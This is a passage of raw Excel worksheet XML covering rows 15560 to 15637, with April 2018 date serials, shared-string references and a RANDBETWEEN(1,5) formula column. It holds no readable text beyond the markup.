    <row r="15560" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15560" s="1">
        <v>43217.251655092594</v>
      </c>
      <c r="C15560" t="s">
        <v>314</v>
      </c>
      <c r="E15560" s="2" t="s">
        <v>14000</v>
      </c>
      <c r="F15560">
        <f t="shared" ca="1" si="243"/>
        <v>5</v>
      </c>
    </row>
    <row r="15561" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15561" s="1">
        <v>43217.250949074078</v>
      </c>
      <c r="C15561" t="s">
        <v>124</v>
      </c>
      <c r="E15561" t="s">
        <v>14001</v>
      </c>
      <c r="F15561">
        <f t="shared" ca="1" si="243"/>
        <v>1</v>
      </c>
    </row>
    <row r="15562" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15562" s="1">
        <v>43217.250601851854</v>
      </c>
      <c r="C15562" t="s">
        <v>173</v>
      </c>
      <c r="E15562" t="s">
        <v>14002</v>
      </c>
      <c r="F15562">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15563" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15563" s="1">
        <v>43217.229259259257</v>
      </c>
      <c r="C15563" t="s">
        <v>2082</v>
      </c>
      <c r="D15563" t="s">
        <v>290</v>
      </c>
      <c r="E15563" t="s">
        <v>14003</v>
      </c>
      <c r="F15563">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15564" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A15564" s="1">
        <v>43217.229062500002</v>
      </c>
      <c r="C15564" t="s">
        <v>48</v>
      </c>
      <c r="E15564" s="2" t="s">
        <v>14004</v>
      </c>
      <c r="F15564">
        <f t="shared" ca="1" si="243"/>
        <v>1</v>
      </c>
    </row>
    <row r="15565" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A15565" s="1">
        <v>43217.22215277778</v>
      </c>
      <c r="C15565" t="s">
        <v>2552</v>
      </c>
      <c r="E15565" s="2" t="s">
        <v>58</v>
      </c>
      <c r="F15565">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15566" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15566" s="1">
        <v>43217.217812499999</v>
      </c>
      <c r="C15566" t="s">
        <v>48</v>
      </c>
      <c r="E15566" t="s">
        <v>14005</v>
      </c>
      <c r="F15566">
        <f t="shared" ca="1" si="243"/>
        <v>5</v>
      </c>
    </row>
    <row r="15567" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15567" s="1">
        <v>43217.212592592594</v>
      </c>
      <c r="C15567" t="s">
        <v>60</v>
      </c>
      <c r="D15567" t="s">
        <v>36</v>
      </c>
      <c r="E15567" s="2" t="s">
        <v>14006</v>
      </c>
      <c r="F15567">
        <f t="shared" ca="1" si="243"/>
        <v>1</v>
      </c>
    </row>
    <row r="15568" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A15568" s="1">
        <v>43217.202488425923</v>
      </c>
      <c r="C15568" t="s">
        <v>71</v>
      </c>
      <c r="D15568" t="s">
        <v>312</v>
      </c>
      <c r="E15568" s="2" t="s">
        <v>14007</v>
      </c>
      <c r="F15568">
        <f t="shared" ca="1" si="243"/>
        <v>1</v>
      </c>
    </row>
    <row r="15569" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A15569" s="1">
        <v>43217.193958333337</v>
      </c>
      <c r="C15569" t="s">
        <v>48</v>
      </c>
      <c r="D15569" t="s">
        <v>312</v>
      </c>
      <c r="E15569" s="2" t="s">
        <v>14008</v>
      </c>
      <c r="F15569">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15570" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15570" s="1">
        <v>43217.178090277775</v>
      </c>
      <c r="C15570" t="s">
        <v>10</v>
      </c>
      <c r="D15570" t="s">
        <v>39</v>
      </c>
      <c r="E15570" t="s">
        <v>14009</v>
      </c>
      <c r="F15570">
        <f t="shared" ca="1" si="243"/>
        <v>5</v>
      </c>
    </row>
    <row r="15571" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15571" s="1">
        <v>43217.177708333336</v>
      </c>
      <c r="C15571" t="s">
        <v>41</v>
      </c>
      <c r="E15571" t="s">
        <v>12144</v>
      </c>
      <c r="F15571">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15572" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15572" s="1">
        <v>43217.159097222226</v>
      </c>
      <c r="C15572" t="s">
        <v>65</v>
      </c>
      <c r="E15572" t="s">
        <v>14010</v>
      </c>
      <c r="F15572">
        <f t="shared" ca="1" si="243"/>
        <v>5</v>
      </c>
    </row>
    <row r="15573" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A15573" s="1">
        <v>43217.138287037036</v>
      </c>
      <c r="C15573" t="s">
        <v>559</v>
      </c>
      <c r="E15573" s="2" t="s">
        <v>14011</v>
      </c>
      <c r="F15573">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15574" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15574" s="1">
        <v>43217.127430555556</v>
      </c>
      <c r="C15574" t="s">
        <v>140</v>
      </c>
      <c r="D15574" t="s">
        <v>141</v>
      </c>
      <c r="E15574" t="s">
        <v>14012</v>
      </c>
      <c r="F15574">
        <f t="shared" ca="1" si="243"/>
        <v>4</v>
      </c>
    </row>
    <row r="15575" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15575" s="1">
        <v>43217.123402777775</v>
      </c>
      <c r="C15575" t="s">
        <v>253</v>
      </c>
      <c r="E15575" t="s">
        <v>14013</v>
      </c>
      <c r="F15575">
        <f t="shared" ca="1" si="243"/>
        <v>1</v>
      </c>
    </row>
    <row r="15576" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15576" s="1">
        <v>43217.039270833331</v>
      </c>
      <c r="C15576" t="s">
        <v>4508</v>
      </c>
      <c r="D15576" t="s">
        <v>56</v>
      </c>
      <c r="E15576" t="s">
        <v>13951</v>
      </c>
      <c r="F15576">
        <f t="shared" ca="1" si="243"/>
        <v>1</v>
      </c>
    </row>
    <row r="15577" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A15577" s="1">
        <v>43217.021608796298</v>
      </c>
      <c r="C15577" t="s">
        <v>41</v>
      </c>
      <c r="E15577" s="2" t="s">
        <v>14014</v>
      </c>
      <c r="F15577">
        <f t="shared" ca="1" si="243"/>
        <v>4</v>
      </c>
    </row>
    <row r="15578" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15578" s="1">
        <v>43216.917314814818</v>
      </c>
      <c r="C15578" t="s">
        <v>339</v>
      </c>
      <c r="E15578" s="2" t="s">
        <v>14015</v>
      </c>
      <c r="F15578">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15579" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15579" s="1">
        <v>43216.901296296295</v>
      </c>
      <c r="C15579" t="s">
        <v>1050</v>
      </c>
      <c r="D15579" t="s">
        <v>158</v>
      </c>
      <c r="E15579" t="s">
        <v>13951</v>
      </c>
      <c r="F15579">
        <f t="shared" ca="1" si="243"/>
        <v>5</v>
      </c>
    </row>
    <row r="15580" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15580" s="1">
        <v>43216.841666666667</v>
      </c>
      <c r="C15580" t="s">
        <v>410</v>
      </c>
      <c r="D15580" t="s">
        <v>158</v>
      </c>
      <c r="E15580" s="2" t="s">
        <v>14016</v>
      </c>
      <c r="F15580">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15581" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15581" s="1">
        <v>43216.825578703705</v>
      </c>
      <c r="C15581" t="s">
        <v>6</v>
      </c>
      <c r="D15581" t="s">
        <v>25</v>
      </c>
      <c r="E15581" s="2" t="s">
        <v>14017</v>
      </c>
      <c r="F15581">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15582" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15582" s="1">
        <v>43216.822071759256</v>
      </c>
      <c r="C15582" t="s">
        <v>634</v>
      </c>
      <c r="D15582" t="s">
        <v>290</v>
      </c>
      <c r="E15582" s="2" t="s">
        <v>14018</v>
      </c>
      <c r="F15582">
        <f t="shared" ca="1" si="243"/>
        <v>5</v>
      </c>
    </row>
    <row r="15583" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15583" s="1">
        <v>43216.765196759261</v>
      </c>
      <c r="C15583" t="s">
        <v>10</v>
      </c>
      <c r="D15583" t="s">
        <v>86</v>
      </c>
      <c r="E15583" t="s">
        <v>14019</v>
      </c>
      <c r="F15583">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15584" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15584" s="1">
        <v>43216.763506944444</v>
      </c>
      <c r="C15584" t="s">
        <v>10</v>
      </c>
      <c r="D15584" t="s">
        <v>11</v>
      </c>
      <c r="E15584" t="s">
        <v>14020</v>
      </c>
      <c r="F15584">
        <f t="shared" ca="1" si="243"/>
        <v>5</v>
      </c>
    </row>
    <row r="15585" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A15585" s="1">
        <v>43216.763483796298</v>
      </c>
      <c r="C15585" t="s">
        <v>189</v>
      </c>
      <c r="E15585" s="2" t="s">
        <v>14021</v>
      </c>
      <c r="F15585">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15586" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15586" s="1">
        <v>43216.753009259257</v>
      </c>
      <c r="C15586" t="s">
        <v>10</v>
      </c>
      <c r="D15586" t="s">
        <v>163</v>
      </c>
      <c r="E15586" t="s">
        <v>14022</v>
      </c>
      <c r="F15586">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15587" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15587" s="1">
        <v>43216.737453703703</v>
      </c>
      <c r="C15587" t="s">
        <v>197</v>
      </c>
      <c r="E15587" s="2" t="s">
        <v>14023</v>
      </c>
      <c r="F15587">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15588" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15588" s="1">
        <v>43216.720405092594</v>
      </c>
      <c r="C15588" t="s">
        <v>471</v>
      </c>
      <c r="E15588" t="s">
        <v>14024</v>
      </c>
      <c r="F15588">
        <f t="shared" ca="1" si="243"/>
        <v>1</v>
      </c>
    </row>
    <row r="15589" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15589" s="1">
        <v>43216.704340277778</v>
      </c>
      <c r="C15589" t="s">
        <v>634</v>
      </c>
      <c r="D15589" t="s">
        <v>80</v>
      </c>
      <c r="E15589" s="2" t="s">
        <v>14025</v>
      </c>
      <c r="F15589">
        <f t="shared" ca="1" si="243"/>
        <v>4</v>
      </c>
    </row>
    <row r="15590" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A15590" s="1">
        <v>43216.687083333331</v>
      </c>
      <c r="C15590" t="s">
        <v>6</v>
      </c>
      <c r="D15590" t="s">
        <v>25</v>
      </c>
      <c r="E15590" s="2" t="s">
        <v>14026</v>
      </c>
      <c r="F15590">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15591" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15591" s="1">
        <v>43216.682557870372</v>
      </c>
      <c r="C15591" t="s">
        <v>318</v>
      </c>
      <c r="D15591" t="s">
        <v>11</v>
      </c>
      <c r="F15591">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15592" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A15592" s="1">
        <v>43216.654814814814</v>
      </c>
      <c r="C15592" t="s">
        <v>260</v>
      </c>
      <c r="E15592" s="2" t="s">
        <v>14027</v>
      </c>
      <c r="F15592">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15593" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15593" s="1">
        <v>43216.650462962964</v>
      </c>
      <c r="C15593" t="s">
        <v>10</v>
      </c>
      <c r="D15593" t="s">
        <v>52</v>
      </c>
      <c r="E15593" t="s">
        <v>14028</v>
      </c>
      <c r="F15593">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15594" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15594" s="1">
        <v>43216.646412037036</v>
      </c>
      <c r="C15594" t="s">
        <v>10</v>
      </c>
      <c r="D15594" t="s">
        <v>374</v>
      </c>
      <c r="E15594" t="s">
        <v>14029</v>
      </c>
      <c r="F15594">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15595" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15595" s="1">
        <v>43216.643159722225</v>
      </c>
      <c r="C15595" t="s">
        <v>10</v>
      </c>
      <c r="D15595" t="s">
        <v>667</v>
      </c>
      <c r="E15595" s="2" t="s">
        <v>14030</v>
      </c>
      <c r="F15595">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15596" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A15596" s="1">
        <v>43216.639837962961</v>
      </c>
      <c r="C15596" t="s">
        <v>6</v>
      </c>
      <c r="D15596" t="s">
        <v>194</v>
      </c>
      <c r="E15596" s="2" t="s">
        <v>14031</v>
      </c>
      <c r="F15596">
        <f t="shared" ca="1" si="243"/>
        <v>4</v>
      </c>
    </row>
    <row r="15597" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15597" s="1">
        <v>43216.608460648145</v>
      </c>
      <c r="C15597" t="s">
        <v>48</v>
      </c>
      <c r="E15597" s="2" t="s">
        <v>14032</v>
      </c>
      <c r="F15597">
        <f t="shared" ca="1" si="243"/>
        <v>4</v>
      </c>
    </row>
    <row r="15598" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15598" s="1">
        <v>43216.595891203702</v>
      </c>
      <c r="C15598" t="s">
        <v>10</v>
      </c>
      <c r="D15598" t="s">
        <v>52</v>
      </c>
      <c r="E15598" t="s">
        <v>14033</v>
      </c>
      <c r="F15598">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15599" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15599" s="1">
        <v>43216.590868055559</v>
      </c>
      <c r="C15599" t="s">
        <v>10</v>
      </c>
      <c r="D15599" t="s">
        <v>11</v>
      </c>
      <c r="E15599" t="s">
        <v>14034</v>
      </c>
      <c r="F15599">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15600" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A15600" s="1">
        <v>43216.572199074071</v>
      </c>
      <c r="C15600" t="s">
        <v>10</v>
      </c>
      <c r="D15600" t="s">
        <v>89</v>
      </c>
      <c r="E15600" s="2" t="s">
        <v>14035</v>
      </c>
      <c r="F15600">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15601" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15601" s="1">
        <v>43216.568171296298</v>
      </c>
      <c r="C15601" t="s">
        <v>410</v>
      </c>
      <c r="D15601" t="s">
        <v>367</v>
      </c>
      <c r="E15601" s="2" t="s">
        <v>14036</v>
      </c>
      <c r="F15601">
        <f t="shared" ca="1" si="243"/>
        <v>4</v>
      </c>
    </row>
    <row r="15602" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A15602" s="1">
        <v>43216.559131944443</v>
      </c>
      <c r="C15602" t="s">
        <v>865</v>
      </c>
      <c r="D15602" t="s">
        <v>271</v>
      </c>
      <c r="E15602" s="2" t="s">
        <v>14037</v>
      </c>
      <c r="F15602">
        <f t="shared" ca="1" si="243"/>
        <v>4</v>
      </c>
    </row>
    <row r="15603" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A15603" s="1">
        <v>43216.558379629627</v>
      </c>
      <c r="C15603" t="s">
        <v>1414</v>
      </c>
      <c r="D15603" t="s">
        <v>194</v>
      </c>
      <c r="E15603" s="2" t="s">
        <v>14038</v>
      </c>
      <c r="F15603">
        <f t="shared" ca="1" si="243"/>
        <v>5</v>
      </c>
    </row>
    <row r="15604" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15604" s="1">
        <v>43216.538078703707</v>
      </c>
      <c r="C15604" t="s">
        <v>290</v>
      </c>
      <c r="D15604" t="s">
        <v>632</v>
      </c>
      <c r="F15604">
        <f t="shared" ca="1" si="243"/>
        <v>1</v>
      </c>
    </row>
    <row r="15605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15605" s="1">
        <v>43216.52721064815</v>
      </c>
      <c r="C15605" t="s">
        <v>743</v>
      </c>
      <c r="D15605" t="s">
        <v>602</v>
      </c>
      <c r="E15605" t="s">
        <v>13951</v>
      </c>
      <c r="F15605">
        <f t="shared" ca="1" si="243"/>
        <v>1</v>
      </c>
    </row>
    <row r="15606" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15606" s="1">
        <v>43216.511666666665</v>
      </c>
      <c r="C15606" t="s">
        <v>10</v>
      </c>
      <c r="D15606" t="s">
        <v>494</v>
      </c>
      <c r="E15606" t="s">
        <v>14039</v>
      </c>
      <c r="F15606">
        <f t="shared" ca="1" si="243"/>
        <v>5</v>
      </c>
    </row>
    <row r="15607" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15607" s="1">
        <v>43216.510972222219</v>
      </c>
      <c r="C15607" t="s">
        <v>229</v>
      </c>
      <c r="F15607">
        <f t="shared" ca="1" si="243"/>
        <v>5</v>
      </c>
    </row>
    <row r="15608" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15608" s="1">
        <v>43216.508668981478</v>
      </c>
      <c r="C15608" t="s">
        <v>10</v>
      </c>
      <c r="D15608" t="s">
        <v>6</v>
      </c>
      <c r="E15608" t="s">
        <v>14040</v>
      </c>
      <c r="F15608">
        <f t="shared" ca="1" si="243"/>
        <v>4</v>
      </c>
    </row>
    <row r="15609" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15609" s="1">
        <v>43216.505069444444</v>
      </c>
      <c r="C15609" t="s">
        <v>10</v>
      </c>
      <c r="D15609" t="s">
        <v>20</v>
      </c>
      <c r="E15609" s="2" t="s">
        <v>14041</v>
      </c>
      <c r="F15609">
        <f t="shared" ca="1" si="243"/>
        <v>5</v>
      </c>
    </row>
    <row r="15610" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15610" s="1">
        <v>43216.486516203702</v>
      </c>
      <c r="C15610" t="s">
        <v>623</v>
      </c>
      <c r="D15610" t="s">
        <v>494</v>
      </c>
      <c r="E15610" s="2" t="s">
        <v>14042</v>
      </c>
      <c r="F15610">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15611" s="1">
        <v>43216.482233796298</v>
      </c>
      <c r="C15611" t="s">
        <v>10</v>
      </c>
      <c r="D15611" t="s">
        <v>52</v>
      </c>
      <c r="E15611" t="s">
        <v>14043</v>
      </c>
      <c r="F15611">
        <f t="shared" ca="1" si="243"/>
        <v>2</v>
      </c>
    </row>
    <row r="15612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15612" s="1">
        <v>43216.478668981479</v>
      </c>
      <c r="C15612" t="s">
        <v>71</v>
      </c>
      <c r="E15612" t="s">
        <v>14044</v>
      </c>
      <c r="F15612">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15613" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15613" s="1">
        <v>43216.46775462963</v>
      </c>
      <c r="C15613" t="s">
        <v>10</v>
      </c>
      <c r="D15613" t="s">
        <v>46</v>
      </c>
      <c r="E15613" t="s">
        <v>14045</v>
      </c>
      <c r="F15613">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15614" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15614" s="1">
        <v>43216.459803240738</v>
      </c>
      <c r="C15614" t="s">
        <v>10</v>
      </c>
      <c r="D15614" t="s">
        <v>36</v>
      </c>
      <c r="E15614" t="s">
        <v>14046</v>
      </c>
      <c r="F15614">
        <f t="shared" ca="1" si="243"/>
        <v>4</v>
      </c>
    </row>
    <row r="15615" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15615" s="1">
        <v>43216.453344907408</v>
      </c>
      <c r="C15615" t="s">
        <v>634</v>
      </c>
      <c r="D15615" t="s">
        <v>92</v>
      </c>
      <c r="E15615" s="2" t="s">
        <v>14047</v>
      </c>
      <c r="F15615">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15616" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15616" s="1">
        <v>43216.440462962964</v>
      </c>
      <c r="C15616" t="s">
        <v>48</v>
      </c>
      <c r="E15616" t="s">
        <v>14048</v>
      </c>
      <c r="F15616">
        <f t="shared" ca="1" si="243"/>
        <v>3</v>
      </c>
    </row>
    <row r="15617" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A15617" s="1">
        <v>43216.436284722222</v>
      </c>
      <c r="C15617" t="s">
        <v>82</v>
      </c>
      <c r="D15617" t="s">
        <v>94</v>
      </c>
      <c r="E15617" s="2" t="s">
        <v>14049</v>
      </c>
      <c r="F15617">
        <f t="shared" ca="1" si="243"/>
        <v>1</v>
      </c>
    </row>
    <row r="15618" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A15618" s="1">
        <v>43216.433946759258</v>
      </c>
      <c r="C15618" t="s">
        <v>10</v>
      </c>
      <c r="D15618" t="s">
        <v>89</v>
      </c>
      <c r="E15618" s="2" t="s">
        <v>14050</v>
      </c>
      <c r="F15618">
        <f t="shared" ref="F15618:F15681" ca="1" si="244">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="15619" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15619" s="1">
        <v>43216.398530092592</v>
      </c>
      <c r="C15619" t="s">
        <v>634</v>
      </c>
      <c r="D15619" t="s">
        <v>82</v>
      </c>
      <c r="E15619" s="2" t="s">
        <v>14051</v>
      </c>
      <c r="F15619">
        <f t="shared" ca="1" si="244"/>
        <v>2</v>
      </c>
    </row>
    <row r="15620" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15620" s="1">
        <v>43216.393310185187</v>
      </c>
      <c r="C15620" t="s">
        <v>10</v>
      </c>
      <c r="D15620" t="s">
        <v>178</v>
      </c>
      <c r="E15620" t="s">
        <v>14052</v>
      </c>
      <c r="F15620">
        <f t="shared" ca="1" si="244"/>
        <v>5</v>
      </c>
    </row>
    <row r="15621" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15621" s="1">
        <v>43216.391203703701</v>
      </c>
      <c r="C15621" t="s">
        <v>471</v>
      </c>
      <c r="E15621" t="s">
        <v>14053</v>
      </c>
      <c r="F15621">
        <f t="shared" ca="1" si="244"/>
        <v>2</v>
      </c>
    </row>
    <row r="15622" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15622" s="1">
        <v>43216.366643518515</v>
      </c>
      <c r="C15622" t="s">
        <v>10</v>
      </c>
      <c r="D15622" t="s">
        <v>112</v>
      </c>
      <c r="E15622" t="s">
        <v>14054</v>
      </c>
      <c r="F15622">
        <f t="shared" ca="1" si="244"/>
        <v>2</v>
      </c>
    </row>
    <row r="15623" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15623" s="1">
        <v>43216.34747685185</v>
      </c>
      <c r="C15623" t="s">
        <v>10</v>
      </c>
      <c r="D15623" t="s">
        <v>36</v>
      </c>
      <c r="E15623" s="2" t="s">
        <v>14055</v>
      </c>
      <c r="F15623">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15624" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15624" s="1">
        <v>43216.333379629628</v>
      </c>
      <c r="C15624" t="s">
        <v>16</v>
      </c>
      <c r="E15624" s="2" t="s">
        <v>14056</v>
      </c>
      <c r="F15624">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15625" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A15625" s="1">
        <v>43216.329548611109</v>
      </c>
      <c r="C15625" t="s">
        <v>16</v>
      </c>
      <c r="E15625" s="2" t="s">
        <v>14057</v>
      </c>
      <c r="F15625">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15626" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15626" s="1">
        <v>43216.321076388886</v>
      </c>
      <c r="C15626" t="s">
        <v>140</v>
      </c>
      <c r="D15626" t="s">
        <v>141</v>
      </c>
      <c r="F15626">
        <f t="shared" ca="1" si="244"/>
        <v>5</v>
      </c>
    </row>
    <row r="15627" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A15627" s="1">
        <v>43216.318622685183</v>
      </c>
      <c r="C15627" t="s">
        <v>16</v>
      </c>
      <c r="E15627" s="2" t="s">
        <v>14058</v>
      </c>
      <c r="F15627">
        <f t="shared" ca="1" si="244"/>
        <v>2</v>
      </c>
    </row>
    <row r="15628" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15628" s="1">
        <v>43216.311944444446</v>
      </c>
      <c r="C15628" t="s">
        <v>4500</v>
      </c>
      <c r="D15628" t="s">
        <v>821</v>
      </c>
      <c r="E15628" t="s">
        <v>14059</v>
      </c>
      <c r="F15628">
        <f t="shared" ca="1" si="244"/>
        <v>2</v>
      </c>
    </row>
    <row r="15629" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15629" s="1">
        <v>43216.310300925928</v>
      </c>
      <c r="C15629" t="s">
        <v>71</v>
      </c>
      <c r="E15629" t="s">
        <v>14060</v>
      </c>
      <c r="F15629">
        <f t="shared" ca="1" si="244"/>
        <v>2</v>
      </c>
    </row>
    <row r="15630" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15630" s="1">
        <v>43216.302372685182</v>
      </c>
      <c r="C15630" t="s">
        <v>634</v>
      </c>
      <c r="D15630" t="s">
        <v>2214</v>
      </c>
      <c r="E15630" s="2" t="s">
        <v>14061</v>
      </c>
      <c r="F15630">
        <f t="shared" ca="1" si="244"/>
        <v>1</v>
      </c>
    </row>
    <row r="15631" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A15631" s="1">
        <v>43216.271284722221</v>
      </c>
      <c r="C15631" t="s">
        <v>50</v>
      </c>
      <c r="E15631" s="2" t="s">
        <v>14062</v>
      </c>
      <c r="F15631">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15632" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15632" s="1">
        <v>43216.251481481479</v>
      </c>
      <c r="C15632" t="s">
        <v>156</v>
      </c>
      <c r="D15632" t="s">
        <v>6</v>
      </c>
      <c r="E15632" t="s">
        <v>13951</v>
      </c>
      <c r="F15632">
        <f t="shared" ca="1" si="244"/>
        <v>4</v>
      </c>
    </row>
    <row r="15633" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A15633" s="1">
        <v>43216.243067129632</v>
      </c>
      <c r="C15633" t="s">
        <v>10</v>
      </c>
      <c r="D15633" t="s">
        <v>92</v>
      </c>
      <c r="E15633" s="2" t="s">
        <v>14063</v>
      </c>
      <c r="F15633">
        <f t="shared" ca="1" si="244"/>
        <v>5</v>
      </c>
    </row>
    <row r="15634" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A15634" s="1">
        <v>43216.20716435185</v>
      </c>
      <c r="C15634" t="s">
        <v>2155</v>
      </c>
      <c r="D15634" t="s">
        <v>229</v>
      </c>
      <c r="E15634" t="s">
        <v>13951</v>
      </c>
      <c r="F15634">
        <f t="shared" ca="1" si="244"/>
        <v>3</v>
      </c>
    </row>
    <row r="15635" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A15635" s="1">
        <v>43216.192754629628</v>
      </c>
      <c r="C15635" t="s">
        <v>41</v>
      </c>
      <c r="E15635" s="2" t="s">
        <v>14064</v>
      </c>
      <c r="F15635">
        <f t="shared" ca="1" si="244"/>
        <v>1</v>
      </c>
    </row>
    <row r="15636" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15636" s="1">
        <v>43216.167222222219</v>
      </c>
      <c r="C15636" t="s">
        <v>634</v>
      </c>
      <c r="D15636" t="s">
        <v>494</v>
      </c>
      <c r="E15636" s="2" t="s">
        <v>14065</v>
      </c>
      <c r="F15636">
        <f t="shared" ca="1" si="244"/>
        <v>5</v>
      </c>
    </row>
    <row r="15637" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A15637" s="1">
        <v>43216.152812499997</v>
      </c>
      <c r="C15637" t="s">
        <v>410</v>
      </c>
      <c r="D15637" t="s">
        <v>602</v>
      </c>
      <c r="E15637" s="2" t="s">
        <v>14066</v>
      </c>
